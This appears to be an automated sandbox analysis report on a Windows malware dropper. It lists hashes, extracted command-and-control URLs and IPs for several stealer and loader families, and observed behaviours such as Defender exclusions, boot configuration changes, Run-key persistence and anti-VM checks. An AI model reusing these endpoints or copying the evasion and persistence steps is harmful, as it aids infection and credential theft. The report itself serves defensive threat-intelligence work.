Analysis
-
max time kernel
61s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
23-12-2024 22:21
Static task
static1
Behavioral task
behavioral1
Sample
e44d0cf1c7fec887595324fd936becaaf0829a7a5428922c6ba6640dfb7b3e54.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
e44d0cf1c7fec887595324fd936becaaf0829a7a5428922c6ba6640dfb7b3e54.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
setup_installer.exe
Resource
win7-20241010-en
General
-
Target
e44d0cf1c7fec887595324fd936becaaf0829a7a5428922c6ba6640dfb7b3e54.exe
-
Size
15.0MB
-
MD5
59da93f7275c407be37c11b186afe771
-
SHA1
7ba67e2d2c52cdda2559f29d9f7fd30c0ab7ad06
-
SHA256
e44d0cf1c7fec887595324fd936becaaf0829a7a5428922c6ba6640dfb7b3e54
-
SHA512
565a716df02f07f6e978e09f7f8777dd5ce03821fb9a89c92186327a8dbab5d5e61403e85d0e685cc9a0d999ad575bbf16107a36d469460f1e0aa635dfbd8491
-
SSDEEP
393216:JpiYJMqb/cqhesqz2kKPvW8uqdHgieSIwKR:JpiYTtwGm8JdHQSI
Malware Config
Extracted
socelars
http://www.wgqpw.com/
Extracted
privateloader
http://212.193.30.45/proxies.txt
http://212.193.30.29/server.txt
pastebin.com/raw/A7dSG1te
http://wfsdragon.ru/api/setStats.php
212.192.241.62
Extracted
redline
@Tui
185.215.113.44:23759
-
auth_value
f4763503fd39f2719d3cbb75871d93ad
Signatures
-
Detect Fabookie payload 1 IoCs
resource yara_rule behavioral1/files/0x000600000001660e-102.dat family_fabookie -
Fabookie family
-
Glupteba family
-
Nullmixer family
-
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
Privateloader family
-
Raccoon Stealer V1 payload 7 IoCs
resource yara_rule behavioral1/memory/352-228-0x0000000000C60000-0x00000000010FE000-memory.dmp family_raccoon_v1 behavioral1/memory/352-229-0x0000000000C60000-0x00000000010FE000-memory.dmp family_raccoon_v1 behavioral1/memory/352-232-0x0000000000C60000-0x00000000010FE000-memory.dmp family_raccoon_v1 behavioral1/memory/352-231-0x0000000000C60000-0x00000000010FE000-memory.dmp family_raccoon_v1 behavioral1/memory/352-230-0x0000000000C60000-0x00000000010FE000-memory.dmp family_raccoon_v1 behavioral1/memory/352-227-0x0000000000C60000-0x00000000010FE000-memory.dmp family_raccoon_v1 behavioral1/memory/352-258-0x0000000000C60000-0x00000000010FE000-memory.dmp family_raccoon_v1 -
Raccoon family
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 7 IoCs
resource yara_rule behavioral1/memory/824-165-0x0000000000A30000-0x0000000000AC9000-memory.dmp family_redline behavioral1/memory/828-197-0x0000000000C50000-0x0000000000D27000-memory.dmp family_redline behavioral1/memory/824-241-0x0000000000A30000-0x0000000000AC9000-memory.dmp family_redline behavioral1/memory/828-206-0x0000000000C50000-0x0000000000D27000-memory.dmp family_redline behavioral1/memory/824-328-0x0000000000A30000-0x0000000000AC9000-memory.dmp family_redline behavioral1/memory/828-333-0x0000000000C50000-0x0000000000D27000-memory.dmp family_redline behavioral1/memory/828-643-0x0000000000C50000-0x0000000000D27000-memory.dmp family_redline -
Redline family
-
Socelars family
-
Socelars payload 1 IoCs
resource yara_rule behavioral1/files/0x0007000000015ccf-105.dat family_socelars -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" Fri003da4b0a49fa71b6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" Fri003da4b0a49fa71b6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Fri003da4b0a49fa71b6.exe = "0" Fri003da4b0a49fa71b6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" Fri003da4b0a49fa71b6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" Fri003da4b0a49fa71b6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" Fri003da4b0a49fa71b6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" Fri003da4b0a49fa71b6.exe -
Detected Nirsoft tools 1 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral1/files/0x000600000001660e-102.dat Nirsoft -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Fri005fb51f7290280.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Fri000511de73f4d6ca.exe -
Modifies boot configuration data using bcdedit 14 IoCs
pid Process 2400 bcdedit.exe 1156 bcdedit.exe 2740 bcdedit.exe 1124 bcdedit.exe 2608 bcdedit.exe 1676 bcdedit.exe 3028 bcdedit.exe 1804 bcdedit.exe 1336 bcdedit.exe 2228 bcdedit.exe 1048 bcdedit.exe 1488 bcdedit.exe 2944 bcdedit.exe 292 bcdedit.exe -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral1/files/0x000600000001660e-102.dat WebBrowserPassView -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2184 powershell.exe 2960 powershell.exe 2968 powershell.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 2304 netsh.exe -
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
-
resource yara_rule behavioral1/files/0x0006000000016cf0-75.dat aspack_v212_v242 behavioral1/files/0x0006000000016cab-76.dat aspack_v212_v242 behavioral1/files/0x0006000000016d4c-83.dat aspack_v212_v242 -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Fri005fb51f7290280.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Fri000511de73f4d6ca.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Fri000511de73f4d6ca.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Fri005fb51f7290280.exe -
Executes dropped EXE 31 IoCs
pid Process 2804 setup_installer.exe 2076 setup_install.exe 1820 Fri00aca824dcfa8.exe 1644 Fri0009837acb0e3f.exe 1776 Fri000511de73f4d6ca.exe 2156 Fri0024e24e95c5.exe 2180 Fri00787d8fbee5ae2.exe 824 Fri009539f6ca3c9b1.exe 2416 Fri00d11173c6bdedf9.exe 1864 Fri006106b9f3.exe 352 Fri005fb51f7290280.exe 1324 Fri006e94a111.exe 1092 Fri002d0eb8ad1c781.exe 1288 Fri00d11173c6bdedf9.exe 2552 Fri003da4b0a49fa71b6.exe 828 Fri00ea564f2dd.exe 556 Fri007f1a815cd.exe 532 Fri00a6abc266a1e.exe 284 Fri00a70cad68c17.exe 596 Fri00aca824dcfa8.tmp 3044 Fri006955771d552.exe 2176 Fri00c13dae83a537d.exe 2832 Fri007b242a25024db8.exe 376 Fri00aca824dcfa8.exe 2224 Fri00aca824dcfa8.tmp 2152 Q7J2UrO1XZC8DQK.EXe 348 Fri003da4b0a49fa71b6.exe 1876 csrss.exe 828 Fri006955771d552.exe 2604 patch.exe 2200 injector.exe -
Loads dropped DLL 64 IoCs
pid Process 2672 e44d0cf1c7fec887595324fd936becaaf0829a7a5428922c6ba6640dfb7b3e54.exe 2804 setup_installer.exe 2804 setup_installer.exe 2804 setup_installer.exe 2804 setup_installer.exe 2804 setup_installer.exe 2804 setup_installer.exe 2076 setup_install.exe 2076 setup_install.exe 2076 setup_install.exe 2076 setup_install.exe 2076 setup_install.exe 2076 setup_install.exe 2076 setup_install.exe 2076 setup_install.exe 1532 cmd.exe 1532 cmd.exe 2912 cmd.exe 468 cmd.exe 1776 Fri000511de73f4d6ca.exe 1776 Fri000511de73f4d6ca.exe 1644 Fri0009837acb0e3f.exe 1644 Fri0009837acb0e3f.exe 2904 cmd.exe 2256 cmd.exe 2256 cmd.exe 2216 cmd.exe 2156 Fri0024e24e95c5.exe 2156 Fri0024e24e95c5.exe 1820 Fri00aca824dcfa8.exe 760 cmd.exe 824 Fri009539f6ca3c9b1.exe 824 Fri009539f6ca3c9b1.exe 1820 Fri00aca824dcfa8.exe 2416 Fri00d11173c6bdedf9.exe 2416 Fri00d11173c6bdedf9.exe 2096 cmd.exe 2924 cmd.exe 2108 cmd.exe 3016 cmd.exe 352 Fri005fb51f7290280.exe 352 Fri005fb51f7290280.exe 2924 cmd.exe 2108 cmd.exe 2764 cmd.exe 2916 cmd.exe 2916 cmd.exe 1324 Fri006e94a111.exe 1324 Fri006e94a111.exe 1092 Fri002d0eb8ad1c781.exe 1092 Fri002d0eb8ad1c781.exe 2416 Fri00d11173c6bdedf9.exe 2552 Fri003da4b0a49fa71b6.exe 2552 Fri003da4b0a49fa71b6.exe 1288 Fri00d11173c6bdedf9.exe 1288 Fri00d11173c6bdedf9.exe 828 Fri00ea564f2dd.exe 828 Fri00ea564f2dd.exe 1820 Fri00aca824dcfa8.exe 1516 cmd.exe 1516 cmd.exe 2400 cmd.exe 1640 cmd.exe 556 Fri007f1a815cd.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
System Binary Proxy Execution: Odbcconf 1 TTPs 3 IoCs
Abuse Odbcconf to proxy execution of malicious code.
pid Process 2624 mshta.exe 2860 cmd.exe 1828 odbcconf.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" Fri003da4b0a49fa71b6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Fri003da4b0a49fa71b6.exe = "0" Fri003da4b0a49fa71b6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" Fri003da4b0a49fa71b6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" Fri003da4b0a49fa71b6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" Fri003da4b0a49fa71b6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" Fri003da4b0a49fa71b6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" Fri003da4b0a49fa71b6.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" Fri003da4b0a49fa71b6.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Fri005fb51f7290280.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Fri000511de73f4d6ca.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 31 IoCs
flow ioc 8 iplogger.org 58 iplogger.org 144 iplogger.org 161 iplogger.org 164 iplogger.org 170 iplogger.org 175 iplogger.org 177 iplogger.org 189 iplogger.org 70 pastebin.com 181 iplogger.org 190 iplogger.org 194 iplogger.org 154 iplogger.org 192 iplogger.org 63 pastebin.com 162 iplogger.org 182 iplogger.org 80 iplogger.org 172 iplogger.org 52 iplogger.org 136 iplogger.org 10 iplogger.org 44 iplogger.org 62 pastebin.com 91 iplogger.org 127 iplogger.org 156 iplogger.org 166 iplogger.org 176 iplogger.org 179 iplogger.org -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 26 ip-api.com -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 824 Fri009539f6ca3c9b1.exe 828 Fri00ea564f2dd.exe 352 Fri005fb51f7290280.exe 352 Fri005fb51f7290280.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3044 set thread context of 828 3044 Fri006955771d552.exe 121 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN Fri003da4b0a49fa71b6.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Logs\CBS\CbsPersist_20241223222233.cab makecab.exe File opened for modification C:\Windows\rss Fri003da4b0a49fa71b6.exe File created C:\Windows\rss\csrss.exe Fri003da4b0a49fa71b6.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Program crash 3 IoCs
pid pid_target Process procid_target 2792 1092 WerFault.exe 2284 556 WerFault.exe 1772 1324 WerFault.exe 64 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language odbcconf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri007f1a815cd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri006955771d552.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri00d11173c6bdedf9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri00d11173c6bdedf9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri007b242a25024db8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri003da4b0a49fa71b6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri0024e24e95c5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri009539f6ca3c9b1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup_installer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri005fb51f7290280.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri00ea564f2dd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri00c13dae83a537d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri006955771d552.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup_install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri000511de73f4d6ca.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri002d0eb8ad1c781.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri00aca824dcfa8.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Q7J2UrO1XZC8DQK.EXe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e44d0cf1c7fec887595324fd936becaaf0829a7a5428922c6ba6640dfb7b3e54.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri00aca824dcfa8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri0009837acb0e3f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri006e94a111.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri00aca824dcfa8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri003da4b0a49fa71b6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csrss.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri00aca824dcfa8.tmp -
Kills process with taskkill 2 IoCs
pid Process 2276 taskkill.exe 1652 taskkill.exe -
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\SearchScopes\Version = "3" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = e0aa37368955db01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000007c60b7222cba97488d2a223d9ed175600000000002000000000010660000000100002000000061e8b1bf633765cac30df7f094f31da571c3170519a318382f780ce0542b3180000000000e80000000020000200000007895cef78ed96ddaafbd4f6ed8586b1941d7c5caa513535b5661914ff45da2c5200000008a9eb62d0755a6c38ecb237d239be4e94113bc8042ac051e2166f0295c83bee34000000053dfdf13a9ecf4a431c58ea2ac59191aba87dd107b31771d7cb425fdbba6bc2e8af1c8d99e63683f6f3e662042baaa0abeee53544ceb074f71f0ca1c14c29d20 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconPath = "C:\\Users\\Admin\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000007c60b7222cba97488d2a223d9ed17560000000000200000000001066000000010000200000000dae26832c1eba5b1b9de956b39b6ad5058ece992dfd406ec5068d87377963d9000000000e8000000002000020000000e03dd7cdb6c6cfa5903d74f09437faadbb6f51f1cae2e128af0ee4e99c6f978290000000ffd90b3c36ae7c52c635a9952623dfebebd7a5bb5adedd93b367859fc5470cf291f7fc5ae3867c10f0ae6b9ece0b47e87fe06eba6f483df9fbc7b40a1849c8fcc96d0854b317b3a7ec04d1e3a369613e923ab19729f4ee59340af5c2711f08e44e2e92ea796db0cecf524d46dd3c877bf1d0cfdf8b696d08c0db720686d288cd29f114029cb9f86ee48a2deafb2a330c40000000a871d617455c5b01a1b873dd92ee9f5bb05a6d64fc8168f02a41e897fd718843df270734474a0536962fca56ad30a765b95582f36c0b3ac1bb37cd3238e62785 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\URL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\SearchScopes\UpgradeTime = 1097b6368955db01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\TopResultURLFallback = "http://www.bing.com/search?q={searchTerms}&src=IE-TopResult&FORM=IETR02" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURLFallback = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}§ionHeight={ie:sectionHeight}&FORM=IESS02&market={language}" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconURLFallback = "http://www.bing.com/favicon.ico" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{60DD6411-C17C-11EF-8318-F2DF7204BD4F} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (int) 